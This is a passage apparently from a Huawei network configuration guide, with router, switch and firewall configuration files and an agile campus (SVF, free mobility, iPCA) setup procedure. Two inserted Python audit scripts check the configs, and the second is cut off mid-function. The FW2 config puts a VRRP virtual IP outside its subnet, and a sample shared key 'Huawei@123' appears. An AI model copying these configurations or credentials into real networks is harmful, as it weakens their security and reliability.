Ping 10.10.100.1: 32 data bytes, Press Ctrl_C to break
Reply From 10.10.100.1: bytes=32 seq=1 ttl=253 time=235 ms
Reply From 10.10.100.1: bytes=32 seq=2 ttl=253 time=109 ms
Reply From 10.10.100.1: bytes=32 seq=3 ttl=253 time=79 ms
Reply From 10.10.100.1: bytes=32 seq=4 ttl=253 time=63 ms
Reply From 10.10.100.1: bytes=32 seq=5 ttl=253 time=63 ms

--- 10.10.100.1 ping statistics ---
5 packet(s) transmitted
5 packet(s) received


0.00% packet loss
round-trip min/avg/max = 63/109/235 ms

You can find that Router1 and CSS VLANIF 100 can ping each other.

----End

Configuration Files
l Router1 configuration file
#
sysname Router1
#
interface Eth-Trunk1
#
interface Eth-Trunk1.100
dot1q termination vid 10
ip address 10.10.4.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.4.100
vrrp vrid 1 priority 120
#
interface XGigabitEthernet1/0/1
eth-trunk 1
#
interface XGigabitEthernet1/0/2
eth-trunk 1
#
ospf 100 router-id 2.2.2.2
area 0.0.0.0
network 10.10.4.0 0.0.0.255
#
return

l Router2 configuration file
#
sysname Router2
#
interface Eth-Trunk1
#
interface Eth-Trunk1.100
dot1q termination vid 10
ip address 10.10.4.3 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.4.100
#
interface XGigabitEthernet1/0/1
eth-trunk 1
#
interface XGigabitEthernet1/0/2
eth-trunk 1
#
ospf 100 router-id 3.3.3.3
area 0.0.0.0
network 10.10.4.0 0.0.0.255
#
return

l CSS configuration file
#
sysname CSS
#
vlan batch 10 20 30 100 200
#
ip vpn-instance Public
ipv4-family
route-distinguisher 100:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#


ip vpn-instance VRF-A
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
interface Vlanif1
#
interface Vlanif10
ip binding vpn-instance Public
ip address 10.10.4.1 255.255.255.0
#
interface Vlanif20
ip binding vpn-instance Public
ip address 10.10.2.1 255.255.255.0
#
interface Vlanif30
ip binding vpn-instance VRF-A
ip address 10.10.3.1 255.255.255.0
#
interface Vlanif100
ip binding vpn-instance VRF-A
ip address 10.10.100.1 255.255.255.0
#
interface Vlanif200
ip binding vpn-instance VRF-A
ip address 10.10.200.1 255.255.255.0
#
interface Eth-Trunk1
port link-type trunk
port trunk allow-pass vlan 10
#
interface Eth-Trunk2
port link-type trunk
port trunk allow-pass vlan 10
#
interface Eth-Trunk4
port link-type trunk
port trunk allow-pass vlan 20
#
interface Eth-Trunk5
port link-type trunk
port trunk allow-pass vlan 30
#
interface Eth-Trunk6
port link-type trunk
port trunk allow-pass vlan 20
#
interface Eth-Trunk7
port link-type trunk
port trunk allow-pass vlan 30
#
interface Eth-Trunk8
port link-type trunk
port trunk allow-pass vlan 100
#
interface Eth-Trunk9
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/1/0/7
eth-trunk 4


#
interface GigabitEthernet1/1/0/8
eth-trunk 5
#
interface GigabitEthernet1/2/0/7
eth-trunk 6
#
interface GigabitEthernet1/2/0/8
eth-trunk 7
#
interface GigabitEthernet1/3/0/1
eth-trunk 8
#
interface GigabitEthernet1/3/0/2
eth-trunk 9
#
interface GigabitEthernet2/1/0/7
eth-trunk 4
#
interface GigabitEthernet2/1/0/8
eth-trunk 5
#
interface GigabitEthernet2/2/0/7
eth-trunk 6
#
interface GigabitEthernet2/2/0/8
eth-trunk 7
#
interface GigabitEthernet2/3/0/1
eth-trunk 8
#
interface GigabitEthernet2/3/0/2
eth-trunk 9
#
interface XGigabitEthernet1/4/0/0
eth-trunk 1
#
interface XGigabitEthernet1/4/0/1
eth-trunk 2
#
interface XGigabitEthernet2/4/0/0
eth-trunk 1
#
interface XGigabitEthernet2/4/0/1
eth-trunk 2
#
ospf 100 router-id 1.1.1.1
import-route static
area 0.0.0.0
network 10.10.100.0 0.0.0.255
network 10.10.200.0 0.0.0.255
network 10.10.4.0 0.0.0.255
#
ip route-static vpn-instance VRF-A 0.0.0.0 0.0.0.0 10.10.3.5
ip route-static vpn-instance Public 0.0.0.0 0.0.0.0 10.10.4.100
ip route-static vpn-instance Public 10.10.100.0 255.255.255.0 10.10.2.5
ip route-static vpn-instance Public 10.10.200.0 255.255.255.0 10.10.2.5
#
return
l FW1 configuration file
#
interface Eth-Trunk1
alias Eth-Trunk1
ip address 10.1.1.1 255.255.255.0
#
interface Eth-Trunk4
alias Eth-Trunk4
ip address 10.10.2.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.2.5 master

#
interface Eth-Trunk5
alias Eth-Trunk5
ip address 10.10.3.2 255.255.255.0
vrrp vrid 2 virtual-ip 10.10.3.5 master
#
interface GigabitEthernet0/0/0
alias GE0/MGMT
ip address 192.168.0.1 255.255.255.0
dhcp select interface
dhcp server gateway-list 192.168.0.1
#
interface GigabitEthernet1/0/0
undo enable snmp trap updown physic-status
eth-trunk 4
#
interface GigabitEthernet1/0/1
undo enable snmp trap updown physic-status
eth-trunk 4
#
interface GigabitEthernet1/1/0
undo enable snmp trap updown physic-status
eth-trunk 5
#
interface GigabitEthernet1/1/1
undo enable snmp trap updown physic-status
eth-trunk 5
#
interface GigabitEthernet2/0/0
undo enable snmp trap updown physic-status
eth-trunk 1
#
interface GigabitEthernet2/0/1
undo enable snmp trap updown physic-status
eth-trunk 1
#
firewall zone local
set priority 100
#
firewall zone trust
set priority 85
add interface Eth-Trunk5
add interface GigabitEthernet0/0/0
#
firewall zone untrust
set priority 5
add interface Eth-Trunk4
#
firewall zone dmz
set priority 50
add interface Eth-Trunk1
#
ip route-static 0.0.0.0 0.0.0.0 10.10.2.1
ip route-static 10.10.100.0 255.255.255.0 10.10.3.1
ip route-static 10.10.200.0 255.255.255.0 10.10.3.1
#
sysname FW1
#
hrp enable
hrp interface Eth-Trunk1 remote 10.1.1.2
#
firewall packet-filter default permit interzone local trust direction inbound
firewall packet-filter default permit interzone local trust direction outbound
firewall packet-filter default permit interzone local untrust direction outbound
firewall packet-filter default permit interzone local dmz direction inbound
firewall packet-filter default permit interzone local dmz direction outbound

#
return
l FW2 configuration file
#
interface Eth-Trunk1
alias Eth-Trunk1
ip address 10.1.1.2 255.255.255.0
#
interface Eth-Trunk6
alias Eth-Trunk6
ip address 10.10.2.3 255.255.255.0
vrrp vrid 1 virtual-ip 10.10.2.5 slave
#
interface Eth-Trunk7
alias Eth-Trunk7
ip address 10.10.30.30 255.255.255.0
vrrp vrid 2 virtual-ip 10.10.3.5 255.255.255.0 slave
#
interface GigabitEthernet0/0/0
alias GE0/MGMT
ip address 192.168.0.1 255.255.255.0
dhcp select interface
dhcp server gateway-list 192.168.0.1
#
interface GigabitEthernet1/0/0
undo enable snmp trap updown physic-status
eth-trunk 6
#
interface GigabitEthernet1/0/1
undo enable snmp trap updown physic-status
eth-trunk 6
#
interface GigabitEthernet1/1/0
undo enable snmp trap updown physic-status
eth-trunk 7
#
interface GigabitEthernet1/1/1
undo enable snmp trap updown physic-status
eth-trunk 7
#
interface GigabitEthernet2/0/0
undo enable snmp trap updown physic-status
eth-trunk 1
#
interface GigabitEthernet2/0/1
undo enable snmp trap updown physic-status
eth-trunk 1
#
firewall zone local
set priority 100
#
firewall zone trust
set priority 85
add interface Eth-Trunk7
add interface GigabitEthernet0/0/0
#
firewall zone untrust
set priority 5
add interface Eth-Trunk6
#
firewall zone dmz
set priority 50
add interface Eth-Trunk1
#
ip route-static 0.0.0.0 0.0.0.0 10.10.2.1
ip route-static 10.10.100.0 255.255.255.0 10.10.3.1
ip route-static 10.10.200.0 255.255.255.0 10.10.3.1
#
sysname FW2

#
hrp enable
hrp interface Eth-Trunk1 remote 10.1.1.1
#
firewall packet-filter default permit interzone local trust direction inbound
firewall packet-filter default permit interzone local trust direction outbound
firewall packet-filter default permit interzone local untrust direction outbound
firewall packet-filter default permit interzone local dmz direction inbound
firewall packet-filter default permit interzone local dmz direction outbound
#
return
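The FW1 and FW2 configuration files above are the kind of text a reviewer checks before trusting a firewall pair. The following Python script is an added example, not part of this document or of Huawei's software: it parses interface blocks in this configuration format, checks that every VRRP virtual IP lies in the subnet of the interface that carries it (the FW2 Eth-Trunk7 lines above, copied into the constructed sample, do not), and lists the interzone default packet-filter rules whose action is permit so that each one can be confirmed as intended. Function names and the sample text are the example's own.

```python
"""Audit of firewall configuration text in the FW1/FW2 format (added example).

Two checks a reviewer wants before relying on the firewall pair:
  1. every VRRP virtual IP lies in the subnet of the interface it is configured on
     (otherwise the VRRP group cannot come up and the backup path silently breaks);
  2. which interzone default packet-filter rules are 'permit', since a default
     permit between zones is the most permissive setting and must be deliberate.
"""
import ipaddress
import re

# Constructed sample modelled on the FW2 configuration file in this document.
SAMPLE_CONFIG = """\
#
interface Eth-Trunk6
 alias Eth-Trunk6
 ip address 10.10.2.3 255.255.255.0
 vrrp vrid 1 virtual-ip 10.10.2.5 slave
#
interface Eth-Trunk7
 alias Eth-Trunk7
 ip address 10.10.30.30 255.255.255.0
 vrrp vrid 2 virtual-ip 10.10.3.5 255.255.255.0 slave
#
firewall zone untrust
 set priority 5
 add interface Eth-Trunk6
#
firewall packet-filter default permit interzone local trust direction inbound
firewall packet-filter default permit interzone local untrust direction outbound
firewall packet-filter default deny interzone trust untrust direction inbound
#
return
"""

IP_RE = re.compile(r"^\s*ip address (\S+) (\S+)\s*$")
VRRP_RE = re.compile(r"^\s*vrrp vrid (\d+) virtual-ip (\S+)")
FILTER_RE = re.compile(
    r"^\s*firewall packet-filter default (permit|deny) interzone (\S+) (\S+) "
    r"direction (inbound|outbound)\s*$"
)


def parse_interfaces(config):
    """Return {ifname: {'address': IPv4Interface or None, 'vrrp': [(vrid, vip), ...]}}.

    Blocks are separated by lines containing only '#'; only 'interface' blocks are kept.
    """
    interfaces = {}
    current = None
    for line in config.splitlines():
        if line.strip() == "#":
            current = None
            continue
        if line.startswith("interface "):
            current = line.split(None, 1)[1].strip()
            interfaces[current] = {"address": None, "vrrp": []}
            continue
        if current is None:
            continue
        m = IP_RE.match(line)
        if m:
            # ipaddress accepts the dotted netmask form used in the configuration.
            interfaces[current]["address"] = ipaddress.IPv4Interface(f"{m.group(1)}/{m.group(2)}")
            continue
        m = VRRP_RE.match(line)
        if m:
            interfaces[current]["vrrp"].append((int(m.group(1)), ipaddress.IPv4Address(m.group(2))))
    return interfaces


def vrrp_mismatches(config):
    """List (ifname, vrid, vip, interface_network) for every VRRP VIP outside its interface subnet."""
    problems = []
    for name, data in parse_interfaces(config).items():
        addr = data["address"]
        for vrid, vip in data["vrrp"]:
            if addr is None or vip not in addr.network:
                problems.append((name, vrid, str(vip), str(addr.network) if addr else None))
    return problems


def default_permit_interzones(config):
    """Return (zone_a, zone_b, direction) for each interzone default packet-filter rule set to permit."""
    found = []
    for line in config.splitlines():
        m = FILTER_RE.match(line)
        if m and m.group(1) == "permit":
            found.append((m.group(2), m.group(3), m.group(4)))
    return found


if __name__ == "__main__":
    for item in vrrp_mismatches(SAMPLE_CONFIG):
        print("VRRP VIP outside interface subnet:", item)
    for item in default_permit_interzones(SAMPLE_CONFIG):
        print("interzone default permit:", item)
```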

2.4 Example for Configuring an Agile Campus Network

2.4.1 Solution Overview


Campus networks are developing quickly and carry increasingly diverse services. As smart
mobile terminals become widespread on campuses, users need to access campus networks
while moving, and wireless data traffic grows rapidly. Cloud computing requires real-time
service monitoring and service virtualization. Campus networks also need to carry high
definition (HD) video services and social networking services (SNSs). These service
requirements challenge current network deployments. To meet these challenges, Huawei
introduces the agility concept to campus networks based on the software-defined networking
(SDN) architecture. Huawei agile campus network solutions help build high-performance core
networks and highly efficient wireless access networks, and make networks more agile for
services.

On agile networks, flexible and fast agile switches replace traditional switches. For example,
administrators can configure, manage, and maintain devices flexibly and quickly. They do not
need to modify configurations on devices one by one to change a service, or spend a long time
locating a network fault. Users can access an agile network flexibly and quickly, and enjoy the
same network experience at any location using any access mode.

An agile campus network for a university is taken as an example in the following sections to
describe how agile networks improve the network services for campus users.

2.4.2 Networking Requirements


Figure 2-11 shows the original network in the university's main campus. Core switches
manage wired users, and independent ACs manage wireless users.

l Users in different areas of the main campus can access the campus network and connect
to the Internet through the campus network. Wired users use 802.1x authentication and
wireless users use Web authentication to access the network.
The following figure shows only the network deployment for teaching and office areas.
The network deployment for other areas is similar and is not shown in the figure.
l The network provides the Voice over Internet Protocol (VoIP), network printer, and
multimedia services.
l Users in branch campuses can access the main campus network through the Intranet.
l Users outside the campuses can access the main campus network through the Internet.

Figure 2-11 Campus networking diagram for the main campus (with no agile network
deployed)

(Figure not reproduced. It shows the Intranet and Internet connected to an S7700 core switch,
an independent AC managing the APs, S5700LI switches connecting wired users in the
teaching area and office area, and wireless users connecting through APs in the teaching area
and office area.)

The service deployment on the current campus network faces the following problems:
l As the university's population grows, a large number of wireless users demand wireless
services. The wired and wireless networks are deployed separately and are difficult to
manage. The university requires wired and wireless convergence to simplify network
management and improve network operation and maintenance (O&M) efficiency.
l As various network services develop on the campus and users need to access the network
while moving, network information security becomes more important. The university
wants access users classified by role so that service policies and network experience are
consistent wherever users go.
l The university has a large number of network devices and needs to adjust network
services frequently. Network administrators must modify configurations or upgrade
versions on devices one by one to change a service, which is a heavy and tedious
workload. The university wants centralized configuration, management, and maintenance
of network access devices.
l When a network fault occurs, network administrators cannot detect or troubleshoot it
quickly, which affects user experience. The university needs a real-time network quality
monitoring mechanism to reduce the impact of network faults.
The university intends to deploy an agile network to simplify network deployment and
configuration, improve user experience, and improve O&M efficiency.

2.4.3 Network Planning


Figure 2-12 shows the agile campus networking. Two S12708 agile switches are deployed to
set up a cluster switch system (CSS) at the core layer. The S5700LI switches at the
aggregation and access layers are enabled with only Layer 2 forwarding (the S7700 core
switches in the original networking are used at the aggregation layer). Some APs are deployed
in the campus as needed. The S5700LI switches are deployed at the access layer to connect to
and manage wired users and APs, providing wired and wireless coverage for the campus.

Figure 2-12 Agile campus networking diagram

(Figure not reproduced. It shows the Intranet, the Internet, an agile network on a branch
campus, remote access users and an external website server; S12708 core switches in the main
campus together with eSight, the Agile Controller and a data center; and S5700LI switches and
APs serving the teaching area, office area, residential community, library, canteen and stadium
(public areas). It also traces teacher Lee through the day: in the office area at 8:00 a.m., in the
teaching area at 10:00 a.m., in the canteen at 12:00 a.m., in the library at 4:00 p.m., and in the
residential community at 8:00 p.m.)

The requirements for NEs shown in Figure 2-12 are as follows:


l Core switch
Agile switches are used at the core layer. If modular switches are used as agile switches,
X1E cards need to be installed on the switches to implement wired and wireless
convergence.
l Aggregation and access switches
The S2750EI/S5700LI/S5700S-LI/S5720EI (V200R007C00) and
S5720SI/S5720S-SI/S5710-X-LI/E600 (V200R008C00 and V200R009C00) switches can be
used as aggregation and access switches when the Super Virtual Fabric (SVF) function is
required.

l Agile Controller
The Agile Controller integrates functions of the RADIUS server, Portal server, and free
mobility controller, facilitating service adjustment. When a user connects to the network
from different locations, the free mobility controller uniformly delivers network access
rights to ensure that the user can have the same network access rights at different
locations.
l eSight network management system (NMS)
eSight provides a graphical user interface (GUI) to help manage network devices,
perform configurations, and facilitate convenient and visual management.

2.4.4 Feature Planning


After the S12708 agile switches are deployed on the campus network, the following agile
features can be applied to solve the service deployment problems described in 2.4.2
Networking Requirements, and to enable the network to fast and flexibly adapt to service
requirements.

l Wired and wireless convergence: Wired and wireless networks are uniformly managed
and maintained.
Agile switches at the core layer provide native AC capabilities on their line cards, so no
independent AC devices or AC cards (such as ACU2) are required. Administrators do
not need to configure and deploy user access services separately on the wired and
wireless networks, and can manage both as simply as managing one device. The high
switching capacity and scalability of agile switches eliminate the bottlenecks of
centralized traffic forwarding that arise when independent ACs or AC cards are used.
l Free mobility: Service control policies migrate with users, delivering a consistent
experience.
For example, in 2.4.2 Networking Requirements, teacher Lee connects to the campus
network from the office area, teaching area, library, and residential community every
day. On a traditional network he may be granted different access rights in each place; for
example, he can access the essay database only in the office area, teaching area, and
library, but not in the public areas of the campus.
The free mobility solution gives users the same network access rights at different
locations. Network access policies are configured centrally on the Agile Controller and
delivered to all associated access devices. In this way, users obtain the same network
access policies and enjoy a consistent network access experience at any location and
with any IP address.
Table 2-5 lists the access policies that are configured on the Agile Controller and
delivered to three user groups: guest, student, and teacher.

Table 2-5 Free mobility policy configuration

User (Source Security Group) | Resource (Destination Security Group) | Access Control Policy
Guest | Public resources (IP address: 10.10.1.1/32) | Permit
Guest | Education management system (IP address: 10.10.2.1/32) | Forbid
Guest | File Transfer Protocol (FTP) resources (IP address: 10.10.3.1/32) | Forbid
Student | Public resources (IP address: 10.10.1.1/32) | Permit
Student | Education management system (IP address: 10.10.2.1/32) | Forbid
Student | File Transfer Protocol (FTP) resources (IP address: 10.10.3.1/32) | Permit
Teacher | Public resources (IP address: 10.10.1.1/32) | Permit
Teacher | Education management system (IP address: 10.10.2.1/32) | Permit
Teacher | File Transfer Protocol (FTP) resources (IP address: 10.10.3.1/32) | Permit

After the preceding policies are configured, users have the same network access rights
and network experience after passing authentication.
l Super Virtual Fabric (SVF): Agile switches deliver configurations to devices at the
aggregation and access layers.
The SVF solution virtualizes core, aggregation, and access switches on a network into
one switch. The core switch manages the aggregation and access switches, and uses
configuration templates to complete batch configuration of aggregation and access
switches. In this way, administrators do not need to configure switches one by one.
Table 2-6 describes the roles in an SVF system. The agile switch functions as a parent to
manage all access switches (ASs) and APs. In the SVF system, wired and wireless users
are all managed on the parent.

Table 2-6 SVF deployment

Role | Device
Parent | Two S12708 switches in a CSS
Client (level-1 AS) | Switches directly connected to the parent, providing wired connections to access switches or terminals
Client (level-2 AS) | Switches directly connected to level-1 ASs, providing wired connections to terminals
Client (wireless access device) | APs on a WLAN, providing wireless connections to terminals. If APs are deployed in an SVF system, the parent functions as a wireless access controller (AC) to control and manage all APs.

Services on ASs are configured on the parent, and the key states of ASs and APs are
maintained on the parent. Administrators can complete service configurations for
aggregation and access switches by simply connecting unconfigured aggregation and
access switches to the parent. The aggregation and access layers realize zero-touch
configuration, automatic upgrade, and plug-and-play deployment, simplifying network
configuration, management, and maintenance.
NOTE

An SVF system supports at most two levels of ASs and one level of APs. When eSight is deployed to
manage the SVF system, SVF can better simplify device management.
l Packet Conservation Algorithm for Internet (iPCA): iPCA allows an agile network to be
aware of the service quality and to locate network failures.
An agile switch with iPCA configured can monitor packet loss in real time. Table 2-7
lists the packet loss measurement modes. If a link fails, an iPCA-capable switch quickly
detects the fault and immediately sends an alarm to administrators. iPCA makes the
network aware of service quality, reducing the impact of network failures. eSight can
display packet loss measurement results on a GUI, so administrators can easily monitor
network quality.

Table 2-7 iPCA deployment

Packet Loss Measurement Mode | Deployment Scenario
Network-level packet loss measurement | Monitor packet loss on the links between the main campus and branch campuses. iPCA needs to be configured on local and remote core switches.
Device-level packet loss measurement | Monitor packet loss on core switches. iPCA only needs to be configured on local core switches.

Table 2-8 lists the minimum versions supporting agile features and precautions for
configuring these features.

Table 2-8 Applicable versions and precautions

Agile Feature | Minimum Version | Precaution
SVF | V200R007 (V200R007C20 is not included) | A license is required to enable the SVF function on a parent. When enabling the SVF function, ensure that the current and next startup network admission control (NAC) configuration modes are the unified mode. NOTE: The Sx300 series switches cannot set up SVF systems.
Free mobility | V200R006 | The Agile Controller needs to be deployed to enable the free mobility function. Free mobility is supported only in the unified NAC mode.
iPCA | V200R006 | If modular switches are used, X1E cards need to be installed.
Wired and wireless | V200R005 (V200R007C20 is not included) | If modular switches are used, X1E cards need to be installed. For details about the applicable AP models and versions, see the product documents.

2.4.5 Data Planning


Basic Agile Campus Networking
This section uses a simplified version of the preceding agile campus networking to describe
the deployment of agile features. Figure 2-13 shows the networking for teaching area 1 and
the library.

Figure 2-13 Basic agile campus networking diagram

(Figure not reproduced. It shows a branch campus with a core switch (S9706) connected over
the WAN to the core switches (S12708) in the main campus, which form the parent (Parent_1
and Parent_2) and connect to the Agile Controller. Parent_1 ports GE1/1/0/1 and GE1/1/0/2
and Parent_2 ports GE2/1/0/1 and GE2/1/0/2 connect to AS_1 (S5700LI) in teaching area 1
and AS_2 (S5700LI) in the library. AS_3 (S5700LI) in teaching area 1 is attached to AS_1 and
connects PC_1 and AP_1 (AP5010DN) on GE0/0/23 and GE0/0/24, with STA_1 associated to
AP_1. In the library, AS_2 connects PC_2 and AP_2 (AP5010DN), with STA_2 associated to
AP_2.)

Table 2-9 and Table 2-10 describe the data planning based on the preceding networking
diagram.

Table 2-9 Device data planning

Role | Device | Data
Parent | Two S12708 switches in a CSS | /
Level-1 AS | Aggregation switches in teaching area 1; AS_1: S5700-52X-PWR-LI-AC | MAC address: 0200-0000-0011; IP address: 192.168.11.254/24
Level-1 AS | Access switches in the library; AS_2: S5700-52X-PWR-LI-AC | MAC address: 0200-0000-0022; IP address: 192.168.11.253/24
Level-2 AS | Access devices in teaching area 1; AS_3: S5700-28X-PWR-LI-AC | MAC address: 0200-0000-0033; IP address: 192.168.11.252/24
AP | Wireless access devices in teaching area 1; AP_1: AP5010DN-AGN | MAC address: AC85-3DA6-A420
AP | Wireless access devices in the library; AP_2: AP5010DN-AGN | MAC address: AC85-3DA6-F240
Free mobility controller | Agile Controller | IP address: 192.168.2.31; Interconnection key: Huawei@123
RADIUS server | Agile Controller | IP address: 192.168.2.31; Interconnection key: Huawei@123; Authentication port number: 1812
Portal server | Agile Controller | IP address: 192.168.2.31; Interconnection key: Huawei@123; Port number: 50200
Public resource server | File server 1 | IP address: 10.10.1.1/32
Education management system server | File server 2 | IP address: 10.10.2.1/32
FTP resource server | File server 3 | IP address: 10.10.3.1/32
Core switches on branch campus networks | S9706 | /

NOTE
The Agile Controller integrates functions of the RADIUS server and Portal server. On the
Agile Controller, the fixed RADIUS authentication port number is 1812, and the fixed Portal
server port number is 50200.

Table 2-10 VLAN data planning

Data | Description
ID: 11; IP address: 192.168.11.1/24 | (1) SVF management VLAN on which a parent can set up Control and Provisioning of Wireless Access Points (CAPWAP) tunnels with ASs and APs; (2) service VLAN accessed by AP_1 in teaching area 1 and AP_2 in the library; (3) VLAN on which a parent can communicate with the Agile Controller
ID: 101 | Service set VLAN
VLAN that wired users in teaching area 1 belong to. ID: 100; IP address: 192.168.100.1/24 | Service VLAN accessed by wired users in teaching area 1, such as the VLAN that PC_1 belongs to.
VLAN that wired users in the library belong to. ID: 200; IP address: 192.168.200.1/24 | Service VLAN accessed by wired users in the library, such as the VLAN that PC_2 belongs to.
VLAN that mobile terminals in teaching area 1 belong to. ID: 202; IP address: 192.168.202.1/24 | Service VLAN accessed by STAs in teaching area 1, such as the VLAN that STA_1 belongs to.
VLAN that mobile terminals in the library belong to. ID: 204; IP address: 192.168.204.1/24 | Service VLAN accessed by STAs in the library, such as the VLAN that STA_2 belongs to.

2.4.6 Configuration Procedure


This section only describes how to configure agile features, and does not describe other basic
configurations, such as routing connectivity.

SVF Configuration Procedure


Configure ASs to connect to the parent.

1. Configure the two switches in the parent to set up a CSS. For details, see the product
documents.
2. Log in to the CSS and enable the SVF function.
<HUAWEI> system-view
[HUAWEI] vlan batch 11
[HUAWEI] dhcp enable //Enable the DHCP server function so that an AS can obtain an IP address from the parent.
[HUAWEI] interface vlanif 11
[HUAWEI-Vlanif11] ip address 192.168.11.1 24
[HUAWEI-Vlanif11] dhcp select interface
[HUAWEI-Vlanif11] dhcp server option 43 ip-address 192.168.11.1 //Configure the parent to send its IP address to an AS so that the AS can set up a CAPWAP link with the specified IP address.
[HUAWEI-Vlanif11] quit
[HUAWEI] capwap source interface vlanif 11 //Set up a CAPWAP link between the parent and the AS.
[HUAWEI] authentication unified-mode //Change the network admission control (NAC) configuration mode to the unified mode.
[HUAWEI] stp mode rstp //Set the working mode to STP or RSTP when enabling the SVF function.
[HUAWEI] uni-mng //Enable the SVF function and enter the uni-mng view.
Warning: This operation will enable the uni-mng mode and disconnect all ASs.
STP calculation may be triggered and service traffic will be affected.
Continue?[Y/N]: y

NOTE

When enabling the SVF function, ensure that the current and next startup NAC configuration modes are
the unified mode.
You can run the display authentication mode command to check whether the current and next startup
NAC configuration modes are the unified mode. If not, set the modes to the unified mode.
After the traditional and unified modes are switched, restart the device to make the configuration take
effect. By default, the NAC configuration mode is unified mode.
3. Configure access parameters for ASs.
# Configure ASs' names, and specify the device models and management MAC
addresses for the ASs.
[HUAWEI-um] as name as1 model S5700-52X-PWR-LI-AC mac-address 0200-0000-0011
[HUAWEI-um-as-as1] quit
[HUAWEI-um] as name as2 model S5700-52X-PWR-LI-AC mac-address 0200-0000-0022
[HUAWEI-um-as-as2] quit
[HUAWEI-um] as name as3 model S5700-28X-PWR-LI-AC mac-address 0200-0000-0033
[HUAWEI-um-as-as3] quit
# Configure the fabric ports that connect the parent to level-1 ASs (AS_1 and AS_2).
The following example configures the fabric port that connects the parent to AS_1. The
configuration of the fabric port that connects the parent to AS_2 is similar and is not
mentioned here.
[HUAWEI-um] interface fabric-port 1
[HUAWEI-um-fabric-port-1] port member-group interface eth-trunk 1
[HUAWEI-um-fabric-port-1] quit
[HUAWEI-um] quit
[HUAWEI] interface gigabitethernet 1/1/0/1
[HUAWEI-GigabitEthernet1/1/0/1] eth-trunk 1
[HUAWEI-GigabitEthernet1/1/0/1] quit
[HUAWEI] interface gigabitethernet 2/1/0/1
[HUAWEI-GigabitEthernet2/1/0/1] eth-trunk 1
[HUAWEI-GigabitEthernet2/1/0/1] quit
# Configure the fabric port that connects level-1 AS (AS_1) to level-2 AS (AS_3).
[HUAWEI] uni-mng
[HUAWEI-um] as name as1
[HUAWEI-um-as-as1] down-direction fabric-port 4 member-group interface eth-trunk 4
[HUAWEI-um-as-as1] port eth-trunk 4 trunkmember interface gigabitethernet 0/0/23 to 0/0/24
[HUAWEI-um-as-as1] quit
[HUAWEI-um] quit
# Configure the ASs to be authenticated against a whitelist when they connect to the SVF
system.
[HUAWEI] as-auth
[HUAWEI-as-auth] undo auth-mode
[HUAWEI-as-auth] whitelist mac-address 0200-0000-0011
[HUAWEI-as-auth] whitelist mac-address 0200-0000-0022
[HUAWEI-as-auth] whitelist mac-address 0200-0000-0033
[HUAWEI-as-auth] quit
[HUAWEI] quit
4. Clear the configurations of ASs, restart the ASs, and then connect the ASs to the parent
using cables. Subsequently, an SVF system is set up.
NOTE

Before connecting an AS to the parent, ensure that the AS has no configuration file or input on the
console port.
# Clear the configurations of the ASs and restart them. (This process takes 5 minutes.
During the process, ensure that the ASs receive no input on the console port. If the ASs are
unconfigured, you can connect them directly to the parent without restarting them.)
<HUAWEI> reset saved-configuration
Warning: The action will delete the saved configuration in the device.
The configuration will be erased to reconfigure. Continue? [Y/N]:y

# After connecting the cables, run the display as all command to check whether all ASs
have connected to the SVF system successfully.
<HUAWEI> display as all
------------------------------------------------------------------------------
No. Type Mac IP State Name
------------------------------------------------------------------------------
0 S5700-52X-PWR-LI-AC 0200-0000-0011 192.168.11.254 normal as1
1 S5700-52X-PWR-LI-AC 0200-0000-0022 192.168.11.253 normal as2
2 S5700-28X-PWR-LI-AC 0200-0000-0033 192.168.11.252 normal as3
------------------------------------------------------------------------------
Total: 3
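The whitelist step and the display as all check above can be reconciled programmatically. The following Python script is an added example, not part of this document or of Huawei's software: from the planned AS list (the as name ... model ... mac-address commands and Table 2-9) it derives the whitelist mac-address commands, then parses a constructed display as all output in the layout shown above and reports ASs that are missing, in a state other than normal, of a model other than planned, or not in the plan at all. Function names and the sample output are the example's own.

```python
"""Reconcile the SVF access-switch plan with what the parent reports (added example)."""
import re

# Planned ASs from the procedure above: name -> (model, management MAC).
PLANNED_AS = {
    "as1": ("S5700-52X-PWR-LI-AC", "0200-0000-0011"),
    "as2": ("S5700-52X-PWR-LI-AC", "0200-0000-0022"),
    "as3": ("S5700-28X-PWR-LI-AC", "0200-0000-0033"),
}

# Constructed 'display as all' output in the layout shown above. as3 is deliberately
# reported in 'fault' state and an unplanned switch (MAC 0200-0000-0044) is present;
# with the MAC whitelist in effect such a switch should not be admitted, so seeing one
# here is a signal that the whitelist itself needs checking.
SAMPLE_DISPLAY_AS_ALL = """\
------------------------------------------------------------------------------
No. Type Mac IP State Name
------------------------------------------------------------------------------
0 S5700-52X-PWR-LI-AC 0200-0000-0011 192.168.11.254 normal as1
1 S5700-52X-PWR-LI-AC 0200-0000-0022 192.168.11.253 normal as2
2 S5700-28X-PWR-LI-AC 0200-0000-0033 192.168.11.252 fault as3
3 S5700-28X-PWR-LI-AC 0200-0000-0044 192.168.11.251 normal as4
------------------------------------------------------------------------------
Total: 4
"""

# One data row: No. Type Mac IP State Name (the header starts with 'No.' and does not match).
ROW_RE = re.compile(
    r"^\s*(\d+)\s+(\S+)\s+([0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4})"
    r"\s+(\S+)\s+(\S+)\s+(\S+)\s*$"
)


def whitelist_commands(planned):
    """Return the as-auth whitelist commands the plan implies, one per management MAC."""
    return [f"whitelist mac-address {mac}" for _, (_, mac) in sorted(planned.items())]


def parse_display_as_all(text):
    """Parse 'display as all' data rows into {mac: {'model', 'ip', 'state', 'name'}}."""
    rows = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            _, model, mac, ip, state, name = m.groups()
            rows[mac.lower()] = {"model": model, "ip": ip, "state": state, "name": name}
    return rows


def reconcile(planned, display_text):
    """Compare the plan with the parent's view and return a sorted list of findings."""
    seen = parse_display_as_all(display_text)
    planned_by_mac = {mac.lower(): (name, model) for name, (model, mac) in planned.items()}
    findings = []
    for mac, (name, model) in planned_by_mac.items():
        row = seen.get(mac)
        if row is None:
            findings.append(f"missing: {name} ({mac}) is not reported by the parent")
            continue
        if row["state"] != "normal":
            findings.append(f"state: {name} ({mac}) is '{row['state']}', expected 'normal'")
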